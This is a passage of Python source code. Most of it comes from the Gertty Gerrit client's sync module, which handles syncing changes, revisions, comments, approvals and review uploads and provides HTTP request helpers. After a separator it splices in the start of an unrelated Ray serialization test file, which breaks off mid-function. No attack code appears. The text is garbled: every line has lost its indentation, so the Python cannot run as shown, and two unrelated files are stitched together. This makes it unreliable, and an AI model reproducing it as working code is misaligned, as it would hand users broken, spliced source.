name=remote_change['owner'].get('name'),
username=remote_change['owner'].get('username'),
email=remote_change['owner'].get('email'))
if not change:
project = session.getProjectByName(remote_change['project'])
if not project:
self.log.debug("Project %s unknown while syncing change" % (
remote_change['project'],))
remote_project = sync.get('projects/%s' %
(urlparse.quote_plus(remote_change['project']),))
if remote_project:
project = session.createProject(
remote_project['name'],
description=remote_project.get('description', ''))
self.log.info("Created project %s", project.name)
self.results.append(ProjectAddedEvent(project))
sync.submitTask(SyncProjectBranchesTask(project.name, self.priority))
created = dateutil.parser.parse(remote_change['created'])
updated = dateutil.parser.parse(remote_change['updated'])
change = project.createChange(remote_change['id'], account, remote_change['_number'],
remote_change['branch'], remote_change['change_id'],
remote_change['subject'], created,
updated, remote_change['status'],
topic=remote_change.get('topic'))
self.log.info("Created new change %s in local DB.", change.id)
result = ChangeAddedEvent(change)
else:
result = ChangeUpdatedEvent(change)
app.project_cache.clear(change.project)
self.results.append(result)
change.owner = account
if change.status != remote_change['status']:
change.status = remote_change['status']
result.status_changed = True
if remote_change.get('starred'):
change.starred = True
else:
change.starred = False
change.subject = remote_change['subject']
change.updated = dateutil.parser.parse(remote_change['updated'])
change.topic = remote_change.get('topic')
unseen_conflicts = [x.id for x in change.conflicts]
for remote_conflict in remote_conflicts:
conflict_id = remote_conflict['id']
conflict = session.getChangeByID(conflict_id)
if not conflict:
self.log.info("Need to sync conflicting change %s for change %s.",
conflict_id, change.number)
sync.submitTask(SyncChangeTask(conflict_id, priority=self.priority))
else:
if conflict not in change.conflicts:
self.log.info("Added conflict %s for change %s in local DB.",
conflict.number, change.number)
change.addConflict(conflict)
self.results.append(ChangeUpdatedEvent(conflict))
if conflict_id in unseen_conflicts:
unseen_conflicts.remove(conflict_id)
for conflict_id in unseen_conflicts:
conflict = session.getChangeByID(conflict_id)
self.log.info("Deleted conflict %s for change %s in local DB.",
conflict.number, change.number)
change.delConflict(conflict)
self.results.append(ChangeUpdatedEvent(conflict))
repo = gitrepo.get_repo(change.project.name, app.config)
new_revision = False
for remote_commit, remote_revision in remote_change.get('revisions', {}).items():
revision = session.getRevisionByCommit(remote_commit)
# TODO: handle multiple parents
url = sync.app.config.git_url + change.project.name
if 'anonymous http' in remote_revision['fetch']:
ref = remote_revision['fetch']['anonymous http']['ref']
url = remote_revision['fetch']['anonymous http']['url']
auth = False
elif 'http' in remote_revision['fetch']:
auth = True
ref = remote_revision['fetch']['http']['ref']
url = list(urlparse.urlsplit(sync.app.config.url + change.project.name))
url[1] = '%s:%s@%s' % (
urlparse.quote_plus(sync.app.config.username),
urlparse.quote_plus(sync.app.config.password), url[1])
url = urlparse.urlunsplit(url)
elif 'ssh' in remote_revision['fetch']:
ref = remote_revision['fetch']['ssh']['ref']
url = remote_revision['fetch']['ssh']['url']
auth = False
elif 'git' in remote_revision['fetch']:
ref = remote_revision['fetch']['git']['ref']
url = remote_revision['fetch']['git']['url']
auth = False
else:
if len(remote_revision['fetch']):
errMessage = "No supported fetch method found. Server offers: %s" % (
', '.join(remote_revision['fetch'].keys()))
else:
errMessage = "The server is missing the download-commands plugin."
raise Exception(errMessage)
if (not revision) or self.force_fetch:
fetches[url].append('+%(ref)s:%(ref)s' % dict(ref=ref))
if not revision:
revision = change.createRevision(remote_revision['_number'],
remote_revision['commit']['message'], remote_commit,
remote_revision['commit']['parents'][0]['commit'],
auth, ref)
self.log.info("Created new revision %s for change %s revision %s in local DB.",
revision.key, self.change_id, remote_revision['_number'])
new_revision = True
revision.message = remote_revision['commit']['message']
actions = remote_revision.get('actions', {})
revision.can_submit = 'submit' in actions
# TODO: handle multiple parents
if revision.parent not in parent_commits:
parent_revision = session.getRevisionByCommit(revision.parent)
if not parent_revision and change.status not in CLOSED_STATUSES:
sync._syncChangeByCommit(revision.parent, self.priority)
self.log.debug("Change %s revision %s needs parent commit %s synced" %
(change.id, remote_revision['_number'], revision.parent))
parent_commits.add(revision.parent)
result.updateRelatedChanges(session, change)
f = revision.getFile('/COMMIT_MSG')
if f is None:
f = revision.createFile('/COMMIT_MSG', None,
None, None, None)
for remote_path, remote_file in remote_revision['files'].items():
f = revision.getFile(remote_path)
if f is None:
if remote_file.get('binary'):
inserted = deleted = None
else:
inserted = remote_file.get('lines_inserted', 0)
deleted = remote_file.get('lines_deleted', 0)
f = revision.createFile(remote_path, remote_file.get('status', 'M'),
remote_file.get('old_path'),
inserted, deleted)
remote_comments_data = remote_revision['_gertty_remote_comments_data']
for remote_file, remote_comments in remote_comments_data.items():
for remote_comment in remote_comments:
account = session.getAccountByID(remote_comment['author']['_account_id'],
name=remote_comment['author'].get('name'),
username=remote_comment['author'].get('username'),
email=remote_comment['author'].get('email'))
comment = session.getCommentByID(remote_comment['id'])
if not comment:
# Normalize updated -> created
created = dateutil.parser.parse(remote_comment['updated'])
parent = False
if remote_comment.get('side', '') == 'PARENT':
parent = True
fileobj = revision.getFile(remote_file)
if fileobj is None:
fileobj = revision.createFile(remote_file, 'M')
comment = fileobj.createComment(remote_comment['id'], account,
remote_comment.get('in_reply_to'),
created,
parent, remote_comment.get('line'),
remote_comment['message'])
self.log.info("Created new comment %s for revision %s in local DB.",
comment.key, revision.key)
else:
if comment.author != account:
comment.author = account
new_message = False
for remote_message in remote_change.get('messages', []):
if 'author' in remote_message:
account = session.getAccountByID(remote_message['author']['_account_id'],
name=remote_message['author'].get('name'),
username=remote_message['author'].get('username'),
email=remote_message['author'].get('email'))
if account.username != app.config.username:
new_message = True
else:
account = session.getSystemAccount()
message = session.getMessageByID(remote_message['id'])
if not message:
revision = session.getRevisionByNumber(change, remote_message.get('_revision_number', 1))
if revision:
# Normalize date -> created
created = dateutil.parser.parse(remote_message['date'])
message = revision.createMessage(remote_message['id'], account, created,
remote_message['message'])
self.log.info("Created new review message %s for revision %s in local DB.", message.key, revision.key)
else:
self.log.info("Unable to create new review message for revision %s because it is not in local DB (draft?).", remote_message.get('_revision_number'))
else:
if message.author != account:
message.author = account
remote_approval_entries = {}
remote_label_entries = {}
user_voted = False
for remote_label_name, remote_label_dict in remote_change.get('labels', {}).items():
for remote_approval in remote_label_dict.get('all', []):
if remote_approval.get('value') is None:
continue
remote_approval['category'] = remote_label_name
key = '%s~%s' % (remote_approval['category'], remote_approval['_account_id'])
remote_approval_entries[key] = remote_approval
if remote_approval['_account_id'] == sync.account_id and int(remote_approval['value']) != 0:
user_voted = True
for key, value in remote_label_dict.get('values', {}).items():
# +1: "LGTM"
label = dict(value=key,
description=value,
category=remote_label_name)
key = '%s~%s~%s' % (label['category'], label['value'], label['description'])
remote_label_entries[key] = label
remote_approval_keys = set(remote_approval_entries.keys())
remote_label_keys = set(remote_label_entries.keys())
local_approvals = {}
local_labels = {}
user_votes = {}
for approval in change.approvals:
if approval.draft and not new_revision:
# If we have a new revision, we need to delete
# draft local approvals because they can no longer
# be uploaded. Otherwise, keep them because we
# may be about to upload a review. Ignoring an
# approval here means it will not be deleted.
# Also keep track of these approvals so we can
# determine whether we should hold the change
# later.
user_votes[approval.category] = approval.value
# Count draft votes as having voted for the
# purposes of deciding whether to clear the
# reviewed flag later.
user_voted = True
continue
key = '%s~%s' % (approval.category, approval.reviewer.id)
if key in local_approvals:
# Delete duplicate approvals.
session.delete(approval)
else:
local_approvals[key] = approval
local_approval_keys = set(local_approvals.keys())
for label in change.labels:
key = '%s~%s~%s' % (label.category, label.value, label.description)
local_labels[key] = label
local_label_keys = set(local_labels.keys())
for key in local_approval_keys-remote_approval_keys:
session.delete(local_approvals[key])
for key in local_label_keys-remote_label_keys:
session.delete(local_labels[key])
for key in remote_approval_keys-local_approval_keys:
remote_approval = remote_approval_entries[key]
account = session.getAccountByID(remote_approval['_account_id'],
name=remote_approval.get('name'),
username=remote_approval.get('username'),
email=remote_approval.get('email'))
change.createApproval(account,
remote_approval['category'],
remote_approval['value'])
self.log.info("Created approval for change %s in local DB.", change.id)
user_value = user_votes.get(remote_approval['category'], 0)
if user_value > 0 and remote_approval['value'] < 0:
# Someone left a negative vote after the local
# user created a draft positive vote. Hold the
# change so that it doesn't look like the local
# user is ignoring negative feedback.
if not change.held:
change.held = True
result.held_changed = True
self.log.info("Setting change %s to held due to negative review after positive", change.id)
for key in remote_label_keys-local_label_keys:
remote_label = remote_label_entries[key]
change.createLabel(remote_label['category'],
remote_label['value'],
remote_label['description'])
for key in remote_approval_keys.intersection(local_approval_keys):
local_approval = local_approvals[key]
remote_approval = remote_approval_entries[key]
local_approval.value = remote_approval['value']
# For the side effect of updating account info:
account = session.getAccountByID(remote_approval['_account_id'],
name=remote_approval.get('name'),
username=remote_approval.get('username'),
email=remote_approval.get('email'))
remote_permitted_entries = {}
for remote_label_name, remote_label_values in remote_change.get('permitted_labels', {}).items():
for remote_label_value in remote_label_values:
remote_label = dict(category=remote_label_name,
value=remote_label_value)
key = '%s~%s' % (remote_label['category'], remote_label['value'])
remote_permitted_entries[key] = remote_label
remote_permitted_keys = set(remote_permitted_entries.keys())
local_permitted = {}
for permitted in change.permitted_labels:
key = '%s~%s' % (permitted.category, permitted.value)
local_permitted[key] = permitted
local_permitted_keys = set(local_permitted.keys())
for key in local_permitted_keys-remote_permitted_keys:
session.delete(local_permitted[key])
for key in remote_permitted_keys-local_permitted_keys:
remote_permitted = remote_permitted_entries[key]
change.createPermittedLabel(remote_permitted['category'],
remote_permitted['value'])
if not user_voted:
# Only consider changing the reviewed state if we don't have a vote
if new_revision or new_message:
if change.reviewed:
change.reviewed = False
result.review_flag_changed = True
app.project_cache.clear(change.project)
change.outdated = False
for url, refs in fetches.items():
self.log.debug("Fetching from %s with refs %s", url, refs)
try:
repo.fetch(url, refs)
except Exception:
# Backwards compat with GitPython before the multi-ref fetch
# patch.
# (https://github.com/gitpython-developers/GitPython/pull/170)
for ref in refs:
self.log.debug("git fetch %s %s" % (url, ref))
repo.fetch(url, ref)
class CheckReposTask(Task):
# on startup, check all projects
# for any subscribed project withot a local repo or if
# --fetch-missing-refs is supplied, check all local changes for
# missing refs, and sync the associated changes
def __repr__(self):
return '<CheckReposTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
projects = session.getProjects(subscribed=True)
for project in projects:
try:
missing = False
try:
repo = gitrepo.get_repo(project.name, app.config)
except gitrepo.GitCloneError:
missing = True
if missing or app.fetch_missing_refs:
sync.submitTask(
CheckRevisionsTask(project.key,
force_fetch=app.fetch_missing_refs,
priority=LOW_PRIORITY)
)
except Exception:
self.log.exception("Exception checking repo %s" %
(project.name,))
class CheckRevisionsTask(Task):
def __init__(self, project_key, force_fetch=False,
priority=NORMAL_PRIORITY):
super(CheckRevisionsTask, self).__init__(priority)
self.project_key = project_key
self.force_fetch = force_fetch
def __repr__(self):
return '<CheckRevisionsTask %s>' % (self.project_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_key == self.project_key):
return True
return False
def run(self, sync):
app = sync.app
to_sync = set()
with app.db.getSession() as session:
project = session.getProject(self.project_key)
repo = None
try:
repo = gitrepo.get_repo(project.name, app.config)
except gitrepo.GitCloneError:
pass
for change in project.open_changes:
if repo:
for revision in change.revisions:
if repo.checkCommits([revision.parent, revision.commit]):
to_sync.add(change.id)
else:
to_sync.add(change.id)
for change_id in to_sync:
sync.submitTask(SyncChangeTask(change_id,
force_fetch=self.force_fetch,
priority=self.priority))
class UploadReviewsTask(Task):
def __repr__(self):
return '<UploadReviewsTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
for c in session.getPendingTopics():
sync.submitTask(SetTopicTask(c.key, self.priority))
for c in session.getPendingRebases():
sync.submitTask(RebaseChangeTask(c.key, self.priority))
for c in session.getPendingStatusChanges():
sync.submitTask(ChangeStatusTask(c.key, self.priority))
for c in session.getPendingStarred():
sync.submitTask(ChangeStarredTask(c.key, self.priority))
for c in session.getPendingCherryPicks():
sync.submitTask(SendCherryPickTask(c.key, self.priority))
for r in session.getPendingCommitMessages():
sync.submitTask(ChangeCommitMessageTask(r.key, self.priority))
for m in session.getPendingMessages():
sync.submitTask(UploadReviewTask(m.key, self.priority))
class SetTopicTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(SetTopicTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<SetTopicTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
data = dict(topic=change.topic)
change.pending_topic = False
# Inside db session for rollback
sync.put('changes/%s/topic' % (change.id,),
data)
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class RebaseChangeTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(RebaseChangeTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<RebaseChangeTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
change.pending_rebase = False
# Inside db session for rollback
sync.post('changes/%s/rebase' % (change.id,), {})
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class ChangeStarredTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(ChangeStarredTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<ChangeStarredTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
if change.starred:
sync.put('accounts/self/starred.changes/%s' % (change.id,),
data={})
else:
sync.delete('accounts/self/starred.changes/%s' % (change.id,),
data={})
change.pending_starred = False
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class ChangeStatusTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(ChangeStatusTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<ChangeStatusTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
if change.pending_status_message:
data = dict(message=change.pending_status_message)
else:
data = {}
change.pending_status = False
change.pending_status_message = None
# Inside db session for rollback
if change.status == 'ABANDONED':
sync.post('changes/%s/abandon' % (change.id,),
data)
elif change.status == 'NEW':
sync.post('changes/%s/restore' % (change.id,),
data)
elif change.status == 'SUBMITTED':
sync.post('changes/%s/submit' % (change.id,), {})
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class SendCherryPickTask(Task):
def __init__(self, cp_key, priority=NORMAL_PRIORITY):
super(SendCherryPickTask, self).__init__(priority)
self.cp_key = cp_key
def __repr__(self):
return '<SendCherryPickTask %s>' % (self.cp_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.cp_key == self.cp_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
cp = session.getPendingCherryPick(self.cp_key)
data = dict(message=cp.message,
destination=cp.branch)
session.delete(cp)
# Inside db session for rollback
ret = sync.post('changes/%s/revisions/%s/cherrypick' %
(cp.revision.change.id, cp.revision.commit),
data)
if ret and 'id' in ret:
sync.submitTask(SyncChangeTask(ret['id'], priority=self.priority))
class ChangeCommitMessageTask(Task):
def __init__(self, revision_key, priority=NORMAL_PRIORITY):
super(ChangeCommitMessageTask, self).__init__(priority)
self.revision_key = revision_key
def __repr__(self):
return '<ChangeCommitMessageTask %s>' % (self.revision_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.revision_key == self.revision_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
revision = session.getRevision(self.revision_key)
revision.pending_message = False
data = dict(message=revision.message)
# Inside db session for rollback
if sync.version < (2,11,0):
sync.post('changes/%s/revisions/%s/message' %
(revision.change.id, revision.commit),
data)
else:
edit = sync.get('changes/%s/edit' % revision.change.id)
if edit is not None:
raise Exception("Edit already in progress on change %s" %
(revision.change.number,))
sync.put('changes/%s/edit:message' % (revision.change.id,), data)
sync.post('changes/%s/edit:publish' % (revision.change.id,), {})
change_id = revision.change.id
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class UploadReviewTask(Task):
def __init__(self, message_key, priority=NORMAL_PRIORITY):
super(UploadReviewTask, self).__init__(priority)
self.message_key = message_key
def __repr__(self):
return '<UploadReviewTask %s>' % (self.message_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.message_key == self.message_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
message = session.getMessage(self.message_key)
if message is None:
self.log.debug("Message %s has already been uploaded" % (
self.message_key))
return
change = message.revision.change
if not change.held:
self.log.debug("Syncing %s to find out if it should be held" % (change.id,))
t = SyncChangeTask(change.id)
t.run(sync)
self.results += t.results
submit = False
change_id = None
with app.db.getSession() as session:
message = session.getMessage(self.message_key)
revision = message.revision
change = message.revision.change
if change.held:
self.log.debug("Not uploading review to %s because it is held" %
(change.id,))
return
change_id = change.id
current_revision = change.revisions[-1]
if change.pending_status and change.status == 'SUBMITTED':
submit = True
data = dict(message=message.message,
strict_labels=False)
if revision == current_revision:
data['labels'] = {}
for approval in change.draft_approvals:
data['labels'][approval.category] = approval.value
session.delete(approval)
comments = {}
for file in revision.files:
if file.draft_comments:
comment_list = []
for comment in file.draft_comments:
d = dict(line=comment.line,
message=comment.message)
if comment.parent:
d['side'] = 'PARENT'
comment_list.append(d)
session.delete(comment)
comments[file.path] = comment_list
if comments:
data['comments'] = comments
session.delete(message)
# Inside db session for rollback
sync.post('changes/%s/revisions/%s/review' % (change.id, revision.commit),
data)
if submit:
# In another db session in case submit fails after posting
# the message succeeds
with app.db.getSession() as session:
change = session.getChangeByID(change_id)
change.pending_status = False
change.pending_status_message = None
sync.post('changes/%s/submit' % (change_id,), {})
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class PruneDatabaseTask(Task):
def __init__(self, age, priority=NORMAL_PRIORITY):
super(PruneDatabaseTask, self).__init__(priority)
self.age = age
def __repr__(self):
return '<PruneDatabaseTask %s>' % (self.age,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.age == self.age):
return True
return False
def run(self, sync):
if not self.age:
return
app = sync.app
with app.db.getSession() as session:
for change in session.getChanges('status:closed age:%s' % self.age):
t = PruneChangeTask(change.key, priority=self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = VacuumDatabaseTask(priority=self.priority)
self.tasks.append(t)
sync.submitTask(t)
class PruneChangeTask(Task):
def __init__(self, key, priority=NORMAL_PRIORITY):
super(PruneChangeTask, self).__init__(priority)
self.key = key
def __repr__(self):
return '<PruneChangeTask %s>' % (self.key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.key == self.key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.key)
if not change:
return
repo = gitrepo.get_repo(change.project.name, app.config)
self.log.info("Pruning %s change %s status:%s updated:%s" % (
change.project.name, change.number, change.status, change.updated))
change_ref = None
for revision in change.revisions:
if change_ref is None:
change_ref = '/'.join(revision.fetch_ref.split('/')[:-1])
self.log.info("Deleting %s ref %s" % (
change.project.name, revision.fetch_ref))
repo.deleteRef(revision.fetch_ref)
self.log.info("Deleting %s ref %s" % (
change.project.name, change_ref))
try:
repo.deleteRef(change_ref)
except OSError as e:
if e.errno not in [errno.EISDIR, errno.EPERM]:
raise
session.delete(change)
class VacuumDatabaseTask(Task):
def __init__(self, priority=NORMAL_PRIORITY):
super(VacuumDatabaseTask, self).__init__(priority)
def __repr__(self):
return '<VacuumDatabaseTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
session.vacuum()
class Sync(object):
def __init__(self, app, disable_background_sync):
self.user_agent = 'Gertty/%s %s' % (gertty.version.version_info.release_string(),
requests.utils.default_user_agent())
self.version = (0, 0, 0)
self.offline = False
self.account_id = None
self.app = app
self.log = logging.getLogger('gertty.sync')
self.queue = MultiQueue([HIGH_PRIORITY, NORMAL_PRIORITY, LOW_PRIORITY])
self.result_queue = queue.Queue()
self.session = requests.Session()
if self.app.config.auth_type == 'basic':
authclass = requests.auth.HTTPBasicAuth
elif self.app.config.auth_type == 'form':
authclass = FormAuth
else:
authclass = requests.auth.HTTPDigestAuth
self.auth = authclass(
self.app.config.username, self.app.config.password)
self.submitTask(GetVersionTask(HIGH_PRIORITY))
self.submitTask(SyncOwnAccountTask(HIGH_PRIORITY))
if not disable_background_sync:
self.submitTask(CheckReposTask(HIGH_PRIORITY))
self.submitTask(UploadReviewsTask(HIGH_PRIORITY))
self.submitTask(SyncProjectListTask(HIGH_PRIORITY))
self.submitTask(SyncSubscribedProjectsTask(NORMAL_PRIORITY))
self.submitTask(SyncSubscribedProjectBranchesTask(LOW_PRIORITY))
self.submitTask(SyncOutdatedChangesTask(LOW_PRIORITY))
self.submitTask(PruneDatabaseTask(self.app.config.expire_age, LOW_PRIORITY))
self.periodic_thread = threading.Thread(target=self.periodicSync)
self.periodic_thread.daemon = True
self.periodic_thread.start()
def periodicSync(self):
hourly = time.time()
while True:
try:
time.sleep(60)
self.syncSubscribedProjects()
now = time.time()
if now-hourly > 3600:
hourly = now
self.pruneDatabase()
self.syncOutdatedChanges()
except Exception:
self.log.exception('Exception in periodicSync')
def submitTask(self, task):
if not self.offline:
if not self.queue.put(task, task.priority):
task.complete(False)
else:
task.complete(False)
def run(self, pipe):
task = None
while True:
task = self._run(pipe, task)
def _run(self, pipe, task=None):
if not task:
task = self.queue.get()
self.log.debug('Run: %s' % (task,))
try:
task.run(self)
task.complete(True)
self.queue.complete(task)
except (requests.ConnectionError, OfflineError,
requests.exceptions.ChunkedEncodingError,
requests.exceptions.ReadTimeout
) as e:
self.log.warning("Offline due to: %s" % (e,))
if not self.offline:
self.submitTask(GetVersionTask(HIGH_PRIORITY))
self.submitTask(UploadReviewsTask(HIGH_PRIORITY))
self.offline = True
self.app.status.update(offline=True, refresh=False)
os.write(pipe, six.b('refresh\n'))
time.sleep(30)
return task
except Exception:
task.complete(False)
self.queue.complete(task)
self.log.exception('Exception running task %s' % (task,))
self.app.status.update(error=True, refresh=False)
self.offline = False
self.app.status.update(offline=False, refresh=False)
for r in task.results:
self.result_queue.put(r)
os.write(pipe, six.b('refresh\n'))
return None
def url(self, path):
return self.app.config.url + 'a/' + path
def checkResponse(self, response):
self.log.debug('HTTP status code: %d', response.status_code)
if response.status_code == 503:
raise OfflineError("Received 503 status code")
def get(self, path):
url = self.url(path)
self.log.debug('GET: %s' % (url,))
r = self.session.get(url,
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Accept': 'application/json',
'Accept-Encoding': 'gzip',
'User-Agent': self.user_agent})
self.checkResponse(r)
if r.status_code == 200:
ret = json.loads(r.text[4:])
if len(ret):
self.log.debug('200 OK, Received: %s' % (ret,))
else:
self.log.debug('200 OK, No body.')
return ret
def post(self, path, data):
url = self.url(path)
self.log.debug('POST: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.post(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
ret = None
if r.status_code > 400:
raise Exception("POST to %s failed with http code %s (%s)",
path, r.status_code, r.text)
if r.text and len(r.text)>4:
try:
ret = json.loads(r.text[4:])
except Exception:
self.log.exception("Unable to parse result %s from post to %s" %
(r.text, url))
raise
return ret
def put(self, path, data):
url = self.url(path)
self.log.debug('PUT: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.put(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
def delete(self, path, data):
url = self.url(path)
self.log.debug('DELETE: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.delete(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
def syncSubscribedProjects(self):
task = SyncSubscribedProjectsTask(LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def pruneDatabase(self):
task = PruneDatabaseTask(self.app.config.expire_age, LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def syncOutdatedChanges(self):
task = SyncOutdatedChangesTask(LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def _syncChangeByCommit(self, commit, priority):
# Accumulate sync change by commit tasks because they often
# come in batches. This method assumes it is being called
# from within the run queue already and therefore does not
# need to worry about locking the queue.
task = None
for task in self.queue.find(SyncChangesByCommitsTask, priority):
if task.addCommit(commit):
return
task = SyncChangesByCommitsTask([commit], priority)
self.submitTask(task)
def setRemoteVersion(self, version):
base = version.split('-')[0]
parts = base.split('.')
major = minor = micro = 0
if len(parts) > 0:
major = int(parts[0])
if len(parts) > 1:
minor = int(parts[1])
if len(parts) > 2:
micro = int(parts[2])
self.version = (major, minor, micro)
self.log.info("Remote version is: %s (parsed as %s)" % (version, self.version))
def query(self, queries):
changes = []
sortkey = ''
done = False
offset = 0
while not done:
query = '&'.join(queries)
# We don't actually want to limit to 500, but that's the server-side default, and
# if we don't specify this, we won't get a _more_changes flag.
q = 'changes/?n=500%s&%s' % (sortkey, query)
self.log.debug('Query: %s' % (q,))
responses = self.get(q)
if len(queries) == 1:
responses = [responses]
done = True
for batch in responses:
changes += batch
if batch and '_more_changes' in batch[-1]:
done = False
if '_sortkey' in batch[-1]:
sortkey = '&N=%s' % (batch[-1]['_sortkey'],)
else:
offset += len(batch)
sortkey = '&start=%s' % (offset,)
return changes
|
test_basic.py
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import glob
import io
import json
import logging
from multiprocessing import Process
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.ray_constants as ray_constants
import ray.tests.cluster_utils
import ray.tests.utils
from ray.tests.utils import RayTestTimeoutException
logger = logging.getLogger(__name__)
def test_simple_serialization(ray_start_regular):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
if sys.version_info < (3, 0):
primitive_objects.append(long(0)) # noqa: E501,F821
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start_regular):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
